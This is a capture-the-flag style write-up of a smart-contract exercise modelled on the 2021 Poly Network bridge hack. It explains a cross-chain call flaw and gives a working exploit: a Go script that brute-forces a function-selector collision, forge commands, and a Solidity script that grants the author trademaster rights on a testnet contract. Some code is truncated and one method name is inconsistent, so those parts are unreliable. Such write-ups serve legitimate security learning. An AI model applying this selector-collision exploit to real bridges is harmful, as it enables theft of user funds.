Based on the 2021 Poly Network hack from the Rekt Leaderboard.
Poly is a cross-chain protocol allowing users to trigger cross-chain transactions/messaging.
Poly has a contract called the "EthCrossChainManager". It's a privileged contract that has the right to trigger messages from another chain. It's a standard thing for cross-chain projects. It has a function named verifyHeaderAndExecuteTx that anyone can call to execute a cross-chain transaction. It (1) verifies that the block header is correct by checking signatures (seems the other chain was a poa sidechain or) and then (2) checks that the transaction was included within that block with a Merkle proof. One of the last things the function does is call executeCrossChainTx, which makes the call to the target contract. This is where the critical flaw sits. Poly checks that the target is a contract, but they forgot to prevent users from calling a very important target... the "EthCrossChainData" contract
In this repository, TradingBoat.sol
is simulating EthCrossChainManager
and [TradingData.sol
] is simulating EthCrossChainData
The goal is to exploit TradingBoat.sol
and be able to call setTrademasters(address[])
Network | Contract | Address |
Fuji | TradingBoat | 0x423e0D8466B6a962286C718E92b751B87b65a48c |
Sepolia | TradingBoat | 0x871A6C16D8BC5ECA345c697b4aA1CDe4BF95341e |
We have two TradingBoats deployed, one on Sepolia and the other on Avalanche Fuji.
The objective is to make make the TradingBoat on Sepolia call the setTrademasters(address[])
function from TradingData since it is the owner. The below function allow us to do this:
function relayShipment(
string calldata _method,
bytes32[] calldata _args,
uint64 _fromChainId,
address _fromContract,
address _toContract,
bytes calldata _signature
) external {
address fromTradingBoat = tradingData.tradingBoatByChainId(_fromChainId);
CrossChainCall memory crossChainCall = CrossChainCall({
fromChainId: _fromChainId,
fromContract: _fromContract,
toContract: _toContract,
method: _method,
args: _args
// (1) Verify that signature belongs to a trademaster
address signer = _bridgeHash(crossChainCall, fromTradingBoat)
// (2) Call destination contract
bytes memory functionSig = abi.encodePacked(_method, "(bytes32[],uint64,address)");
bytes4 selector = bytes4(keccak256(functionSig));
(bool success, ) =
abi.encodeWithSelector(selector, _args, _fromChainId, _fromContract)
We need to find a _method
so that keccak256(abi.encodePacked(_method, "(bytes32[],uint64,address)"))
first 4 bytes result into setTrademasters(address[])
selector: 0xef51774d
I've written the find.go script to do the job:
package main
import (
func main() {
target, _ := hex.DecodeString("ef51774d")
for result := 0 ; ; result++ {
i := []byte(strconv.Itoa(result))
hash := sha3.NewLegacyKeccak256()
buf := hash.Sum([]byte{})
if bytes.Compare(buf[0:4], target) == 0 {
fmt.Printf("%x found with : attack%d(bytes32[],uint64,address)\n", buf, result )
println("IDX=", result)
if result > 0 && result%1000000 == 0 {
println("IDX=", result)
After few minutes, it returns attack1908084701(bytes32[],uint64,address)
. We can run SendShipment.s.sol
using attack190808470
as _method parameter with forge script scripts/TradingBoat.s.sol --rpc-url fuji -vvv --broadcast
on Fuji.
It returns 0xe563231067eff803d7b67ce328b77866b29f3dfa7e0967f0cae1839c0e3ecc37̀
We give this to the TradeMaster that will search for the matching cross-chain event on Fuji, and return the required signature:
Signature: 0xdfcb71ad5b91bbcb5818aab6c9319c7e025b331bcb1f54bd1082253e29601f3571a06c46d4ca69e33604c6dff656f23eeda01932398ff6f4a50bbc9bcc3041671b
Then, we can use this signature to run RelayShipment.s.sol
// forge script scripts/RelayShipment.s.sol --rpc-url sepolia --broadcast
contract RelayShipmentScript is Script {
uint256 deployerPrivateKey = vm.envUint("PRIVATE_KEY");
function run() public {
TradingBoat tradingBoat = TradingBoat(0x871A6C16D8BC5ECA345c697b4aA1CDe4BF95341e);
uint64 _chainId;
string memory _method = "attack1908084701";
bytes32[] memory _args = new bytes32[](1);
_args[0] = bytes32(uint256(uint160(0x26d403E1E1A1239d8b6f5907dE272CF311104753))); // address to input in setTrademasters(address[])
uint64 _fromChainId = 43113; //fuji
uint64 _toChainId = 11155111; //sepolia
address _fromContract = 0x26d403E1E1A1239d8b6f5907dE272CF311104753; // fuji msg.sender
address _toContract = 0x39eEddbBD4D133c3fcb0fD7B971f807Fc3552569; // sepolia TradingData
bytes memory _signature = hex"dfcb71ad5b91bbcb5818aab6c9319c7e025b331bcb1f54bd1082253e29601f3571a06c46d4ca69e33604c6dff656f23eeda01932398ff6f4a50bbc9bcc3041671b";
tradingBoat.relayShipment(_method, _args, _fromChainId, _fromContract, _toContract, _signature);
Now, our address 0x26d403E1E1A1239d8b6f5907dE272CF311104753 is a TradeMaster aswell.